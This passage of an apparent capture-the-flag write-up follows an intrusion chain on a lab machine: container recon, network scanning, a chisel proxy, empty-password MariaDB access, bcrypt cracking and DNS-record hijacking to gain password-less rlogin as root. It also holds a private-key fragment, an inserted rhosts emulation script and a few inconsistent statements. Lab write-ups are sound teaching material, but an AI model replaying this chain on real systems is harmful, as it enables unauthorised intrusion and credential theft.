b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAm/6DUhI
ohhpEGJwj3C3qvAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIFSs6NCV2xJJ++4a
ohH5HDgMOTsuvoWe3lTcVQmDW2ytAAAAkHUEeuYvOBdKVdSwd5eyr2kFUV05G7azCKN0j+
giavLEwH1wOa+wP1WVmq3jJSJ1geoSbYUH0+fwTbkIm0ARreMOjSwvz7PkX5xIeZZxx1HU
bWLoVkFnBQ8UY0gm5Dpbj5IvjAp7Ij2VitXYX0PfRDQ+bB4cSD7gwTX0Ud+HsAKvPBEvvb
DTsZ0XMDXTRUGloA==
-----END OPENSSH PRIVATE KEY-----
root@5ac6c7d6fb8e:~/.ssh# cat authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFSs6NCV2xJJ++4aohH5HDgMOTsuvoWe3lTcVQmDW2yt root@build

Upload CDK to check whether there is a container escape vector:

root@5ac6c7d6fb8e:~# ./cdk evaluate
CDK (Container DucK)
CDK Version(GitCommit): b4105424a2f329020c388e6e16a42e9bb31ef501
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[  Information Gathering - System Info  ]
2026/01/03 05:16:22 current dir: /root
2026/01/03 05:16:22 current user: root uid: 0 gid: 0 home: /root
2026/01/03 05:16:22 hostname: 5ac6c7d6fb8e
2026/01/03 05:16:22 debian debian 12.4 kernel: 5.15.0-144-generic
2026/01/03 05:16:22 Setuid files found:
        /usr/bin/chfn
        /usr/bin/chsh
        /usr/bin/gpasswd
        /usr/bin/mount
        /usr/bin/newgrp
        /usr/bin/passwd
        /usr/bin/su
        /usr/bin/umount
        /bin/chfn
        /bin/chsh
        /bin/gpasswd
        /bin/mount
        /bin/newgrp
        /bin/passwd
        /bin/su
        /bin/umount

[  Information Gathering - Services  ]
2026/01/03 05:16:22 service found in process:
        7       1       java

[  Information Gathering - Commands and Capabilities  ]
2026/01/03 05:16:22 available commands:
        curl,find,ps,java,apt,dpkg,ssh,git,mount,base64,perl
2026/01/03 05:16:22 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
        CapInh: 0000000000000000
        CapPrm: 00000000a80425fb
        CapEff: 00000000a80425fb
        CapBnd: 00000000a80425fb
        CapAmb: 0000000000000000
        Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:

[  Information Gathering - Mounts  ]
0:54 / / rw,relatime - overlay overlay rw,lowerdir=/var/snap/docker/common/var-lib-docker/overlay2/l/V2F6ZNPIHKU26FVXC5QMEVCKSZ:/var/snap/docker/common/var-lib-docker/overlay2/l/EX3MGHGXA4UDTLSHZXTL3E25FI:/var/snap/docker/common/var-lib-docker/overlay2/l/WJEVTV2RCASDCKLLHRJGOFGTK6:/var/snap/docker/common/var-lib-docker/overlay2/l/VAD74F2AYI4LDRELY74ZHDTATB:/var/snap/docker/common/var-lib-docker/overlay2/l/BZHSNE2E55YFVMN5ETQBXHRI63:/var/snap/docker/common/var-lib-docker/overlay2/l/XU6DS5L66RV5AYZY4I47OKXQQC:/var/snap/docker/common/var-lib-docker/overlay2/l/RUIDGT3NZLDLIHOA2ZPVTRLZP4:/var/snap/docker/common/var-lib-docker/overlay2/l/HZDEZSQFVQMUD3B2JGLMLO5X37:/var/snap/docker/common/var-lib-docker/overlay2/l/6RMUVKVN4R4DRTH74RPQ4KSDHY:/var/snap/docker/common/var-lib-docker/overlay2/l/WQ7ETK3HX4XXJBCWFSSB7WEYLM:/var/snap/docker/common/var-lib-docker/overlay2/l/QHTNHO26H5LQHHW3IUZHWDVMSO:/var/snap/docker/common/var-lib-docker/overlay2/l/2H5DM2W3C7PCPYPMEIJCSUXEOE:/var/snap/docker/common/var-lib-docker/overlay2/l/VCQNF6GCMMA2BVOVFOQVBWRPT7,upperdir=/var/snap/docker/common/var-lib-docker/overlay2/039ea08f40b4927d3175b42a1df2f8ab4d6ce5eb51afbe6b84393d7bcc174055/diff,workdir=/var/snap/docker/common/var-lib-docker/overlay2/039ea08f40b4927d3175b42a1df2f8ab4d6ce5eb51afbe6b84393d7bcc174055/work
0:85 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:86 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:87 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:88 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:69 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:89 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
253:0 /root/scripts/root /root rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /root/scripts/jenkins/jenkins_configuration /var/jenkins_home rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/hostname /etc/hostname rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/hosts /etc/hosts rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
0:85 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:93 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:86 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:86 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:86 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:94 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:95 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64

[  Information Gathering - Net Namespace  ]
        container net namespace isolated.

[  Information Gathering - Sysctl Variables  ]
2026/01/03 05:16:22 net.ipv4.conf.all.route_localnet = 0

[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving

[  Discovery - K8s API Server  ]
2026/01/03 05:16:22 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
        api-server forbids anonymous request.
        response:

[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[  Discovery - Cloud Provider Metadata API  ]
2026/01/03 05:16:23 failed to dial Alibaba Cloud API.
2026/01/03 05:16:24 failed to dial Azure API.
2026/01/03 05:16:24 failed to dial Google Cloud API.
2026/01/03 05:16:24 failed to dial Tencent Cloud API.
2026/01/03 05:16:25 failed to dial OpenStack API.
2026/01/03 05:16:26 failed to dial Amazon Web Services (AWS) API.
2026/01/03 05:16:27 failed to dial ucloud API.

[  Exploit Pre - Kernel Exploits  ]
2026/01/03 05:16:27 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
root@5ac6c7d6fb8e:~# ./cdk ifconfig
2026/01/03 05:23:52 [+] run ifconfig, using GetLocalAddresses()
2026/01/03 05:23:52 lo 127.0.0.1/8
2026/01/03 05:23:52 eth0 172.18.0.3/16
root@5ac6c7d6fb8e:~# ./cdk  netstat
2026/01/03 05:24:54 [+] run netstat, using RunNestat()
ipType          connection      localAddr                       status                  remoteAddr    pid
ipv4            tcp             0.0.0.0:8080                    LISTEN                  0.0.0.0:0                      7
ipv4            tcp             127.0.0.11:37741                LISTEN                  0.0.0.0:0                      0
ipv4            tcp             0.0.0.0:50000                   LISTEN                  0.0.0.0:0                      7
ipv4            tcp             172.18.0.3:41288                ESTABLISHED             10.10.14.79:5566               510
ipv4            tcp             172.18.0.3:35158                ESTABLISHED             10.10.14.79:5566               346
ipv4            tcp             172.18.0.3:51772                TIME_WAIT               172.18.0.2:3000                0
ipv4            tcp             172.18.0.3:35154                ESTABLISHED             10.10.14.79:5566               312
ipv4            tcp             172.18.0.3:51784                TIME_WAIT               172.18.0.2:3000                0
ipv4            tcp             172.18.0.3:51774                TIME_WAIT               172.18.0.2:3000                0
ipv4            udp             127.0.0.11:49745                NONE                    0.0.0.0:0                      0

2.2. Port scanning

root@5ac6c7d6fb8e:~# ./nmap -sn 172.18.0.3/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-03 05:25 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.18.0.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000064s latency).
MAC Address: 02:42:C2:C1:31:E0 (Unknown)
Nmap scan report for gitea.custom (172.18.0.2)
Host is up (0.000022s latency).
MAC Address: 02:42:AC:12:00:02 (Unknown)
Nmap scan report for pdns-db-1.custom (172.18.0.4)
Host is up (0.000019s latency).
MAC Address: 02:42:AC:12:00:04 (Unknown)
Nmap scan report for pdns-pdns-1.custom (172.18.0.5)
Host is up (0.000019s latency).
MAC Address: 02:42:AC:12:00:05 (Unknown)
Nmap scan report for powerdns_admin.custom (172.18.0.6)
Host is up (0.000036s latency).
MAC Address: 02:42:AC:12:00:06 (Unknown)
Nmap scan report for 5ac6c7d6fb8e (172.18.0.3)
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 4.55 seconds

Trying a port scan shows that it does not work:

root@5ac6c7d6fb8e:~# ./nmap 172.18.0.1-172.18.0.6

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-03 05:27 UTC
Unable to find nmap-services!  Resorting to /etc/services
Unable to open /etc/services for reading service information
QUITTING!

Upload fscan and use that instead:

root@5ac6c7d6fb8e:~# ./fscan -h 172.18.0.3/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.18.0.1      is alive
(icmp) Target 172.18.0.2      is alive
(icmp) Target 172.18.0.3      is alive
(icmp) Target 172.18.0.4      is alive
(icmp) Target 172.18.0.5      is alive
(icmp) Target 172.18.0.6      is alive
[*] Icmp alive hosts len is: 6
172.18.0.1:22 open
172.18.0.6:80 open
172.18.0.2:22 open
172.18.0.1:3306 open
172.18.0.4:3306 open
172.18.0.3:8080 open
172.18.0.5:8081 open
172.18.0.1:8081 open
172.18.0.2:3000 open
172.18.0.1:3000 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle http://172.18.0.1:8081    code:401 len:55     title:Unauthorized
[*] WebTitle http://172.18.0.1:3000    code:200 len:13998  title:Gitea: Git with a cup of tea
[*] WebTitle http://172.18.0.2:3000    code:200 len:13998  title:Gitea: Git with a cup of tea
[*] WebTitle http://172.18.0.6         code:302 len:199    title:Redirecting... 跳转url: http://172.18.0.6/login
[+] mysql 172.18.0.1:3306:root
[+] mysql 172.18.0.4:3306:root
[*] WebTitle http://172.18.0.5:8081    code:401 len:55     title:Unauthorized
[*] WebTitle http://172.18.0.6/login   code:200 len:3837   title:Log In - PowerDNS-Admin
[+] InfoScan http://172.18.0.1:3000    [Gitea简易Git服务]
[+] InfoScan http://172.18.0.2:3000    [Gitea简易Git服务]

This reveals that the host machine's MySQL allows login with an empty password.

The target has no SSH service, so I upload Stowaway to set up a proxy:

root@5ac6c7d6fb8e:~# ./chisel server -p 1080 --socks5
2026/01/03 05:37:04 server: Fingerprint ztNAul48viej3zHiJchlWisAewwt7pUq2JUKdiZtSEo=
2026/01/03 05:37:04 server: Listening on http://0.0.0.0:1080

2.3. MySQL empty password

Then connect to MySQL and take a look:

C:\Users\Administrator> mysql -h 172.18.0.4 -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 24
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.


mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| powerdnsadmin      |
| sys                |
+--------------------+
5 rows in set (0.09 sec)

mysql> use  powerdnsadmin;
Database changed
mysql> show tables;
+-------------------------+
| Tables_in_powerdnsadmin |
+-------------------------+
| account                 |
| account_user            |
| alembic_version         |
| apikey                  |
| apikey_account          |
| comments                |
| cryptokeys              |
| domain                  |
| domain_apikey           |
| domain_setting          |
| domain_template         |
| domain_template_record  |
| domain_user             |
| domainmetadata          |
| domains                 |
| history                 |
| records                 |
| role                    |
| sessions                |
| setting                 |
| supermasters            |
| tsigkeys                |
| user                    |
+-------------------------+
23 rows in set (0.09 sec)

mysql> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password                                                     | firstname | lastname | email          | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
|  1 | admin    | $2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq | admin     | admin    | admin@build.vl | NULL       |       1 |         0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.09 sec)

mysql> select * from domain;
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
| id | name     | master | type   | serial     | notified_serial | last_check | dnssec | account_id |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
|  1 | build.vl | []     | Native | 2024050201 |               0 |          0 |      0 |       NULL |
+----+----------+--------+--------+------------+-----------------+------------+--------+------------+
1 row in set (0.09 sec)

mysql> select * from history;
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
| id | msg                                   | detail                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           | created_by | created_on          | domain_id |
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
|  1 | User admin authentication succeeded   | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    | System     | 2024-05-01 15:54:31 |      NULL |
|  2 | Add zone build.vl                     | {"domain_type": "native", "domain_master_ips": [], "account_id": "0"}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            | admin      | 2024-05-01 15:54:43 |         1 |
|  3 | Apply record changes to zone build.vl | {"domain": "build.vl", "add_rrsets": [{"name": "gitea.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.19.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "intern.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.20.0.1", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "jenkins.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.20.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.3", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}], "del_rrsets": []}                                                                                                                                                                                                                                           | admin      | 2024-05-01 15:56:57 |         1 |
|  4 | User admin authentication succeeded   | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    | System     | 2024-05-01 16:32:24 |      NULL |
|  5 | User admin authentication succeeded   | {"username": "admin", "authenticator": "LOCAL", "ip_address": "192.168.94.139", "success": 1}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    | System     | 2024-05-02 10:07:19 |      NULL |
|  6 | Apply record changes to zone build.vl | {"domain": "build.vl", "add_rrsets": [{"name": "db.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.4", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "gitea.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.2", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "intern.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.1", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "jenkins.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.3", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns-worker.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.5", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}, {"name": "pdns.build.vl.", "type": "A", "ttl": 60, "records": [{"content": "172.18.0.6", "disabled": false}], "comments": [{"content": "", "account": ""}], "changetype": "REPLACE"}], "del_rrsets": [{"comments": [{"content": "", "account": ""}], "name": "jenkins.build.vl.", "records": [{"content": "172.20.0.2", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "pdns.build.vl.", "records": [{"content": "172.18.0.3", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "intern.build.vl.", "records": [{"content": "172.20.0.1", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}, {"comments": [{"content": "", "account": ""}], "name": "gitea.build.vl.", "records": [{"content": "172.19.0.2", "disabled": false}], "ttl": 60, "type": "A", "changetype": "DELETE"}]} | admin      | 2024-05-02 10:13:52 |         1 |
+----+---------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+---------------------+-----------+
6 rows in set (0.09 sec)

mysql> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name                 | type | content                                                                                  | ttl  | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
|  8 |         1 | db.build.vl          | A    | 172.18.0.4                                                                               |   60 |    0 |        0 | NULL      |    1 |
|  9 |         1 | gitea.build.vl       | A    | 172.18.0.2                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 10 |         1 | intern.build.vl      | A    | 172.18.0.1                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 11 |         1 | jenkins.build.vl     | A    | 172.18.0.3                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 12 |         1 | pdns-worker.build.vl | A    | 172.18.0.5                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 13 |         1 | pdns.build.vl        | A    | 172.18.0.6                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 14 |         1 | build.vl             | SOA  | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 |    0 |        0 | NULL      |    1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.10 sec)

The user table holds the administrator's password hash, which hashcat cracks from rockyou.txt in seconds:

$2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw5Sc2.hsEq:winston

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2b$12$s1hK0o7YNkJGfu5poWx.0u1WLqKQIgJOXWjjXz7Ze3Uw...2.hsEq
Time.Started.....: Sat Jan 03 14:21:43 2026 (9 secs)
Time.Estimated...: Sat Jan 03 14:21:52 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:      150 H/s (13.60ms) @ Accel:1 Loops:32 Thr:11 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1320/14344388 (0.01%)
Rejected.........: 0/1320 (0.00%)
Restore.Point....: 1056/14344388 (0.01%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:4064-4096
Candidate.Engine.: Device Generator
Candidates.#01...: sanchez -> kingkong
Hardware.Mon.#01.: Temp: 51c Util: 99% Core:2550MHz Mem:8001MHz Bus:8

Password: winston

2.4. DNS Hijacking

With these credentials we can log in to http://172.18.0.6/ (PowerDNS-Admin).
In this panel I can see the IP address and hostname of each container.

Because the fscan port scan was incomplete, I rescanned the host with nmap:

┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# proxychains -q nmap 172.18.0.1 -Pn -sT
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 01:29 EST
Nmap scan report for 172.18.0.1
Host is up (0.29s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
512/tcp  open  exec
>>>> 513/tcp  open  login
514/tcp  open  shell
873/tcp  open  rsync
3000/tcp open  ppp
3306/tcp open  mysql
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 179.50 seconds

Here you can see that the target has port 513 open, which is rlogin.

Remember the .rhosts file we found earlier?

root@5ac6c7d6fb8e:~# cat .rhosts
admin.build.vl +
intern.build.vl +

It lists two hostnames (meaning hosts resolving to these names can connect to this machine without a password), but the current machine is not running any rhosts-based service, so this is probably the host machine's .rhosts configuration.

Now we only need to change the DNS resolution of either name to point at our Kali box; Kali can then log in via rlogin without a password as well.

Here I create a new admin.build.vl record in PowerDNS-Admin and point it at our Kali IP,
after which we can log in without a password.
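Why a single added A record is enough, as an added example that is not part of the original writeup: a Python emulation of the host check behind ~/.rhosts (glibc's ruserok() resolves each entry forward and compares the answers with the connecting address, so no PTR record is needed), with the PowerDNS zone replaced by an in-memory dict. The zone snapshot, the .rhosts copy and the Kali address are constructed from the values shown above; audit_rhosts is a hypothetical helper that lists entries whose protection rests solely on DNS answers.

```python
"""Emulate the ~/.rhosts trust decision and show how a writable DNS zone
subverts it.  Added example, not code from the original writeup.

The match mirrors glibc's ruserok()/__icheckhost(): an entry is trusted when
its forward (A) lookup yields the connecting address, so no PTR record is
needed.  The resolver is an injected dict standing in for the PowerDNS zone,
so the script runs offline; zone contents are constructed.
"""
from dataclasses import dataclass
from typing import Callable, Optional

Resolver = Callable[[str], list]

# Constructed copy of the .rhosts file found in the container.
RHOSTS = "admin.build.vl +\nintern.build.vl +\n"
# Constructed snapshot of the build.vl zone before any tampering.
ZONE = {"intern.build.vl": ["172.18.0.1"], "pdns.build.vl": ["172.18.0.6"]}
# Address of the attacking host, as shown in the rlogin banner (placeholder).
KALI_IP = "10.10.14.79"


@dataclass(frozen=True)
class RhostsEntry:
    host: str            # hostname, or "+" for any host
    user: Optional[str]  # username, "+" for any user, None when absent


def parse_rhosts(text: str) -> list:
    """Parse lines of the form 'host [user]'; '#' starts a comment."""
    entries = []
    for raw in text.splitlines():
        f = raw.split("#", 1)[0].split()
        if f:
            entries.append(RhostsEntry(f[0], f[1] if len(f) > 1 else None))
    return entries


def zone_resolver(zone: dict) -> Resolver:
    """Forward lookup against an in-memory zone (stand-in for PowerDNS)."""
    return lambda name: list(zone.get(name.rstrip("."), []))


def host_matches(entry_host: str, client_ip: str, resolve: Resolver) -> bool:
    """'+', a literal address, or any resolved A record equal to the client."""
    return entry_host in ("+", client_ip) or client_ip in resolve(entry_host)


def is_trusted(rhosts: str, client_ip: str, remote_user: str,
               local_user: str, resolve: Resolver) -> bool:
    """Would rlogin skip the password prompt for this client/user pair?"""
    for e in parse_rhosts(rhosts):
        if not host_matches(e.host, client_ip, resolve):
            continue
        if e.user is None and remote_user == local_user:
            return True
        if e.user in ("+", remote_user):
            return True
    return False


def audit_rhosts(rhosts: str) -> list:
    """Defender view: entries whose security rests only on DNS answers."""
    findings = []
    for e in parse_rhosts(rhosts):
        if e.host == "+":
            findings.append("wildcard host: every client is trusted")
        elif e.user == "+":
            findings.append(f"{e.host}: any user, guarded only by DNS")
    return findings
```

With the original zone, is_trusted(RHOSTS, KALI_IP, "root", "root", zone_resolver(ZONE)) is False; after {**ZONE, "admin.build.vl": [KALI_IP]} it becomes True, which is exactly the record change made in PowerDNS-Admin above.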

┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# rlogin 10.129.234.169
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-144-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jan  3 06:51:20 AM UTC 2026

  System load:  0.04              Processes:             192
  Usage of /:   63.5% of 9.75GB   Users logged in:       0
  Memory usage: 32%               IPv4 address for eth0: 10.129.234.169
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

1 update can be applied immediately.
1 of these updates is a standard security update.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Jan  3 06:51:20 UTC 2026 from 10.10.14.79 on pts/0
root@build:~# whoami;hostname
root
build
root@build:~# cat /root/root.txt
b7b1e48179891ea87e77b1f83bada971